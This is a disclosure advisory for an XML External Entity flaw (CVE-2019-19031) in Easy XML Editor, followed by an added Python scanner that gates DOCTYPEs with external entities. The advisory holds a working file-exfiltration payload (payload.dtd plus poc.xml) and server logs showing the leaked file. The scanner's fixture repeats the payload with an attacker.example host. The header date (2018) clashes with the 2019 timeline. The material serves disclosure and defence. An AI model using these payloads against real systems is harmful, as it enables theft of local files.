# Date: 2018-11-21
# Vendor: Richard Wuerflein
# Software Link: https://www.edit-xml.com/Easy_XML_Editor.exe
# Affected Version: 1.7.8 and before
# Patched Version: unpatched
# Category: Local
# Platform: XML
# Tested on: Windows 10 Pro
# CWE: https://cwe.mitre.org/data/definitions/611.html
# CVE: 2019-19031
# References:
# https://hackpuntes.com/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/

# 1. Technical Description
# Easy XML Editor version 1.7.8 and before is affected by an XML External Entity Injection vulnerability
# through a malicious XML file. This allows a malicious user to read arbitrary files.

# 2. Proof Of Concept (PoC)

# 2.1 Start a webserver to receive the connection.
python -m SimpleHTTPServer 80

# 2.2 Upload the payload.dtd file to your web server.
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>">
%all;

# 2.3 Create a SECRET.TXT file with any content on the desktop.

# 2.4 Open poc.xml
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "file:///C:\Users\<USER>\Desktop\secret.txt">
<!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

# 2.5 Your web server will receive a request with the contents of the secret.txt file
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 -
192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -

# 3. Timeline
# 13, november 2019 - [RESEARCHER] Discover
# 13, november 2019 - [RESEARCHER] Report to vendor support
# 14, november 2019 - [DEVELOPER] Unrecognized vulnerability
# 15, november 2019 - [RESEARCHER] Detailed vulnerability report
# 22, november 2019 - [RESEARCHER] Public disclosure

# 4. Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo
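Added example, not from the advisory: the poc.xml above is dangerous only because its DOCTYPE declares external (SYSTEM) parameter entities and then references them, which is what lets the parser fetch payload.dtd and ship the file contents out of band in the request URL. A pre-parse gate that refuses any document whose DOCTYPE pulls in an external resource stops this whole class regardless of which parser sits behind it. The scanner below is such a gate; the sample documents are constructed, one of them a copy of the advisory's poc.xml with placeholder paths and host, plus a benign document that declares only an internal entity.

```python
import re

# External subset on the DOCTYPE itself: <!DOCTYPE root SYSTEM "...">
_DOCTYPE_RE = re.compile(r"<!DOCTYPE\s+([^\s\[>]+)\s*(SYSTEM|PUBLIC)?", re.I)
# External entity declarations, general or parameter (%): <!ENTITY [%] name SYSTEM/PUBLIC ...
_ENTITY_RE = re.compile(r"<!ENTITY\s+(%\s*)?([^\s]+)\s+(SYSTEM|PUBLIC)\b", re.I)

# Constructed copy of the advisory's poc.xml (placeholder path and host).
POC_XML = '''<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "file:///C:/Users/victim/Desktop/secret.txt">
<!ENTITY % dtd SYSTEM "http://attacker.example/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>'''

# Constructed benign document: a DOCTYPE with only an internal entity.
BENIGN_XML = '''<?xml version="1.0"?>
<!DOCTYPE note [ <!ENTITY company "ACME"> ]>
<note><to>&company;</to></note>'''

NO_DOCTYPE_XML = '<config><debug>false</debug></config>'


def scan_xml(text):
    """List (kind, name, keyword) for every external reference in the DOCTYPE.

    kind is 'doctype' for an external subset, 'parameter' for a %-entity and
    'general' for an ordinary entity; keyword is SYSTEM or PUBLIC.
    """
    findings = []
    dm = _DOCTYPE_RE.search(text)
    if not dm:
        return findings                  # no DOCTYPE at all: nothing can be external
    if dm.group(2):
        findings.append(("doctype", dm.group(1), dm.group(2).upper()))
    for m in _ENTITY_RE.finditer(text):
        kind = "parameter" if m.group(1) else "general"
        findings.append((kind, m.group(2), m.group(3).upper()))
    return findings


def is_safe_to_parse(text):
    """Gate: True only if the document declares no external entity or subset."""
    return not scan_xml(text)


if __name__ == "__main__":
    for label, doc in (("poc", POC_XML), ("benign", BENIGN_XML), ("plain", NO_DOCTYPE_XML)):
        print(label, "safe" if is_safe_to_parse(doc) else scan_xml(doc))
```

The scan is textual, not a full XML parse, so an "<!ENTITY ... SYSTEM" inside a comment also trips it; that is the right direction to fail in for a gate, and anything it rejects can be inspected by hand. The same check run over payload.dtd would flag the nested general entity "send", which is the declaration that performs the exfiltration.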